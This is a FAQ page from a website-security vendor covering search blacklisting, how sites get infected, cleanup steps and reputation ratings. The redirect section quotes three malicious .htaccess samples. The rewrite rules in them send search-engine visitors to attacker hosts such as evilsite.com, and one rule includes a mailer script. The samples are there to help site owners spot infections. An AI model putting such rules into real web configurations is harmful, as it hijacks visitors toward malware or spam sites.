We created this Frequently Asked Questions (FAQ) page to answer some of the most common questions we have received. If you don’t see your question answered here, contact us!

What are blacklists?

• Blacklists contain names of websites which have engaged in malicious or annoying activities, such as distribution of malware, being an accomplice in a Phishing attempt, hosting annoying or dangerous advertisements or other reasons.
• A blacklist is usually lists the names or modified version of the name (such as a hash) of a website.

Why has my site been blacklisted by Google?

• As a public service, Google analyzes websites and determines if the website is distributing malware or has been reported as taking part in a phishing attempt. If your site is listed on Google’s Safe Browsing List, it might have been involved in the distribution of malware (harmful computer programs like viruses).

How do I fix it?

• Clean your website and remove any traces of malware [Detailed Instructions].
• Understand how malware was deposited on your benign website.
• Sign up for website monitoring to prevent it from re-occuring.
• Request a site review from Google.

How long will it take to get off the blacklist?

• It can take from a few hours to as many as 10 days to get off a blacklist. Some individuals have also reported longer time periods. If your website is on a blacklist, it is imperative that you identify the exact cause of the problem and remedy the situation correctly. A lot of webmasters cannot hunt down all traces of malware and hence stay on the blacklist for quite long.

How can Google do this to me?

• Google is not out to hurt websites and businesses. It is simply providing an public service to Internet users. It simply offers a warning about its opinion regarding the security of your website. A cleaner and safer Internet benefits all web surfers.

No one can access my website, my business is being destroyed!

• Modern browsers like Internet Explorer, Firefox, Opera, Safari all consult some form of blacklist before visiting a website. If your website is listed on a blacklist, chances are that your visitors are not able to get to your website. This may incur significant lost revenue for you and may degrade your reputation.

I did not upload any viruses, where did the malware come from?

• Your website has a vulnerability. Think of it as a open door in your house. The hacker has used this door to enter your website and deposit malicious computer code.
• Your web server has a vulnerability. If you do not host your website yourself, you need to make sure that the web server (computer) which is used to host your website is secure. Even large professional hosting companies have problems. Alternatively, If you host your own website, you can take action now by ordering a Vulnerability to Penetration Assessment.
• Your login credentials have been compromised. Hackers often install programs called keyloggers on computers. these programs analyze the keystrokes you are using to type in you password and username. Once the hacker gathers this information they can login to your website silently and wreak havoc. A Web Application Firewall (WAF) will not protect you from this kind of compromise. A website monitoring system will alert you of such a scenario, however.
• Third party software installations may have vulnerabilities. If your website uses an online shopping cart, blogging or forum sofware, from a third party, they may have introduced vulnerabilities into your website, which caused your site to get compromised.

I have Anti-Virus Software on my computer, how could this happen to me?

• Your Anti-Virus software protects your personal computer from threats. It cannot protect your website from attacks by a hacker.

How is your technology better than Anti-Virus?

• Most Anti-Virus systems use signature based mechanisms. Once a piece of malware has been reported as bad, they will be able to detect it on your computer. We take a different approach. We understand the behavior of a piece of malware and then create a profile for malicious computer code. This allows us to hunt down previously unseen pieces of malware. [Read More]

Why did a hacker do this to me?

• The chances are that your site was compromised using automated programs which are developed by hackers and sold on the underground black market. It is very rare that a hacker will take a personal interest in infecting a website.
• Automated hacking tools do not discriminate between small or large websites. It does not matter if you own a small business or a very large one, or even if you just host a blog or a personal website. All websites are fair game for these bad guys.

How can I prevent this from occurring again?

• You should subscribe to a website monitoring service in order to be notified in the case of a malware injection.
• You need to assess the security status of your website applications and web server.
• You need to improve the security of your website applications, such as your blogging software, online shopping cart (update applications).
• You need to improve the security of your web server (update server software or operating system).

Who can help me fix this?

• We, stopthehacker.com, can help you out!
• You may also find helpful volunteers here:
  • Google Webmaster Forum
  • Badwarebusters
  • StopBadware

Why is my hosting company clueless?

• Web hosting companies face a full gamut of issues they need to handle everyday. From customer complaints, billing issues, inquiries and much more. They are not always able to focus on security problems because they don’t have the time or lack the insight of focused security organizations. If you are facing issues and not getting help from your website hosting company, please send us a message, we may be able to get the priority of your case elevated.

Can advertisements on my website cause me to get blacklisted?

• Yes, they can. Hackers can even distribute malicious advertisements to advertisement distribution companies. These ads can find themselves circulated through the digital ecosystem to various benign websites which can cause good websites to get marked as malware distribution points.

My site is PCI certified, am I immune?

• PCI certification is a good first step towards securing your website. Unfortunately, being PCI certified does not ensure immunity to these attacks. PCI certification simply means that the website does follow some best practice guidelines. This does not ensure that a website is immune to code injection attacks, either.

My site has a SSL certificate, I can see a padlock sign, am I immune?

• No. SSL certificates have nothing to do with protection from malware attacks. SSL certificates simply prove that your site is the website it claims to be. It is a sign of a responsible business who wants to confirm their identity to the visitor.

My site has a trustmark, am I safe?

• No. Several companies sell trustmarks. Some trustmarks simply prove that you are a legitimate business, or that you will respect some privacy criteria. Most trustmarks are not related to the security of the website.

Some malware is specific to Internet Explorer, can you detect it?

• Yes, we can detect malware that only triggers when a user browses a site using Internet Explorer. We also use various IP addresses to probe a single website.
• Additionally, we check for malware that triggers when a user visits from search engine web pages like Google, Bing, Yahoo, etc.

When I try to select a service from StopTheHacker, I see a message that says: Your site has 403 pages. My site only has 20 pages, Why do I see this message?

Your site may have many more publicly accessible web pages or web objects than you think. For example –
• Default pages hosted by your web server.
• PDF files, advertisement files (SWFs) accessible via your site.
• Dynamically generated pages (the URLs that end with something like ?p=120) by your content management system (WordPress) or framework (Django).

The service (e.g. Health Monitoring) is listed as $X/month (starting price) on your website, but when I tried to add the service, I am shown a higher price (e.g. Health Monitoring for $60/month). Why?

• Our service prices are based on the size of your website. For example, Health Monitoring services start from $15/month (per site) for small sites with less than 25 pages.
• We suggest that you purchase the level of service that we recommend to you. If you would like to purchase a lower service tier, please contact us.

Why are my customers getting redirected to another website?

• Please try to check your .htaccess file on the webserver. A good resource for this can be found here.
• Also, note that the permissions on the .htaccess file should be 0640/0644. Do not leave this file accessible to everyone.
• A compromised .htaccess file usually has entries that look like:

  RewriteCond /home/sitename/public_html/mailer/incladd.php -f
  RewriteCond %{REQUEST_URI} !incladd.php$
  RewriteCond %{REQUEST_URI} !ca0272.php$
  RewriteRule ^.*\.(php[s345]?|[ p s]
  ?html?).*$ /mailer/incladd.php?file=%{SCRIPT_FILENAME}&%{QUERY_STRING} [NC,L]
  

  another example:

  RewriteEngine On
  ErrorDocument 400 http://evilsite.com/optic/index.php
  ErrorDocument 401 http://evilsite.com/optic/index.php
  ErrorDocument 403 http://evilsite.com/optic/index.php
  ErrorDocument 404 http://evilsite.com/optic/index.php
  ErrorDocument 500 http://evilsite.com/optic/index.php
  RewriteCond %{HTTP_REFERER} .google. [OR]
  RewriteCond %{HTTP_REFERER} .ask. [OR]
  RewriteCond %{HTTP_REFERER} .yahoo. [OR]
  RewriteCond %{HTTP_REFERER} .baidu. [OR]
  RewriteCond %{HTTP_REFERER} .youtube. [OR]
  RewriteCond %{HTTP_REFERER} .wikipedia. [OR]
  RewriteCond %{HTTP_REFERER} .qq. [OR]
  RewriteCond %{HTTP_REFERER} .excite. [OR]
  RewriteCond %{HTTP_REFERER} .altavista. [OR]
  RewriteCond %{HTTP_REFERER} .msn. [OR]
  RewriteCond %{HTTP_REFERER} .netscape. [OR]
  RewriteCond %{HTTP_REFERER} .aol. [OR]
  RewriteCond %{HTTP_REFERER} .hotbot. [OR]
  RewriteCond %{HTTP_REFERER} .goto. [OR]
  RewriteCond %{HTTP_REFERER} .infoseek. [OR]
  RewriteCond %{HTTP_REFERER} .mamma. [OR]
  RewriteCond %{HTTP_REFERER} .alltheweb. [OR]
  RewriteCond %{HTTP_REFERER} .lycos. [OR]
  RewriteCond %{HTTP_REFERER} .search. [OR]
  RewriteCond %{HTTP_REFERER} .metacrawler. [OR]
  RewriteCond %{HTTP_REFERER} .bing. [OR]
  RewriteCond %{HTTP_REFERER} .dogpile. [OR]
  RewriteCond %{HTTP_REFERER} .facebook. [OR]
  RewriteCond %{HTTP_REFERER} .twitter. [OR]
  RewriteCond %{HTTP_REFERER} .blog. [OR]
  RewriteCond %{HTTP_REFERER} .live. [OR]
  RewriteCond %{HTTP_REFERER} .myspace. [OR]
  RewriteCond %{HTTP_REFERER} .mail. [OR]
  RewriteCond %{HTTP_REFERER} .yandex. [OR]
  RewriteCond %{HTTP_REFERER} .rambler. [OR]
  RewriteCond %{HTTP_REFERER} .ya. [OR]
  RewriteCond %{HTTP_REFERER} .aport. [OR]
  RewriteCond %{HTTP_REFERER} .linkedin. [OR] RewriteCond %{HTTP_REFERER} .flickr.
  RewriteRule ^(.*)$ http://evilsite.com/optic/index.php [R=301,L]
  

  yet another example

  <ifmodule>
  RewriteEngine On
  RewriteOptions inherit
  RewriteCond %{HTTP_REFERER} .ask.com.$ [NC,OR]
  RewriteCond %{HTTP_REFERER} .google.$ [NC,OR]
  RewriteCond %{HTTP_REFERER} .msn.com$ [NC,OR]
  RewriteCond %{HTTP_REFERER} .bing.com$ [NC,OR]
  RewriteCond %{HTTP_REFERER} .live.com$ [NC,OR]
  RewriteCond %{HTTP_REFERER} .aol.com$ [NC,OR]
  RewriteCond %{HTTP_REFERER} .altavista.com$ [NC,OR]
  RewriteCond %{HTTP_REFERER} .excite.com$ [NC,OR]
  RewriteCond %{HTTP_REFERER} .search.yahoo$ [NC]
  RewriteRule .* hxxp://sokoloperkovuskeci.com/in.php[removed] [R,L]
  </ifmodule>
  

How do I remove the malware?

1. Log into your website account using your ftp, sftp, ssh, scp, or cPanel password.
2. Once you have access to your website directory, navigate to the main directory where you should be able to see your HTML files (webpages).
3. Download all pages and folders to your local computer.
4. Use a program like grep, Wingrep, ScanFS, Grppola, or Total Commander to search all the downloaded files for malicious patterns.
5. Delete the malicious code. Remember to check your database, templates, .htaccess file and your backups for any copies of the malicious links or code.
6. Upload the cleaned files back to your account.
7. Then, request a review from Google.
8. Scan your local computer with multiple Anti-virus engines.
9. Ask your website hosting company for help with this issue, or point them to us.

Sign up for website monitoring and we can help you with this entire process!

What do the colors in the Rating Legend mean?
Our Rating Legend uses a Threat Level color scheme to indicate the severity of site safety and reputation issues.

Why is my site marked Orange or Yellow?

• This color indicates that the site in question is neither “verified” good or bad.
• The rating is based on a heuristic which checks if the name of the site is similar to a popular “verified” site or not.
• This could suggest typo-squatting.

Why is my site marked Red?

• This color indicates that the site in question has been involved in malicious activity.
• This kind of undesirable behavior ranges from participation in phishing campaigns, spam campaigns, malware distribution and zombie or bot attacks.

Why is my SSL certificate marked Blue?

• This color indicates that your SSL certificate is current and valid. However, your SSL certificate is not an Extended Validation SSL Certificate.

Why is my network reputation marked Orange or Yellow?

• This color indicates that the site in question is hosted on a network which also hosts other malicious websites.
• This gives you an idea of the kind neighborhood your website resides in.

Why is my host reputation marked Orange or Yellow?

• This color indicates that the site in question is hosted on a web server or is associated with an IP address which potentially hosts other malicious websites.
• If there are a large number of malicious websites hosted on the same server as your website, there could be a server level issue which the web host might need to address.

What can I do to improve my reputation rating?

• Your reputation rating can be improved by getting in touch with us via our contact form.
• We will verify that your website is genuine, not involved in typo-squatting or selling misleading products and services. If we make a positive determination, we will change your website’s reputation to safe or good.

What can I do to improve my host reputation rating?

• Your host reputation rating can be improved by getting in touch with your web hosting company and asking them to migrate your website to a reputable server or IP address.

What can I do to improve my network reputation rating?

• The network reputation rating can be improved by migrating your website to a new ISP or web hosting provider.

My site is listed on Clean-MX, Phishtank, or other blacklists, what should I do?

• You should take remediation steps to remove offending web pages and malware from your website.
• Then, visit the websites of the blacklists which have reported your website: such as clean-mx.de and submit a request for review. If you encounter problems doing this, please contact us.

My web of trust score show 0/5, or 1/5, what does this mean?

• Your score at Web Of Trust depends on how many Web Of Trust community members rate your site.
• Your score is 1/5 if not a lot of community members have rated your site, with a positive reputation.
• To improve your score you can visit Web Of Trust and ask community members to rate your website, increasing your score.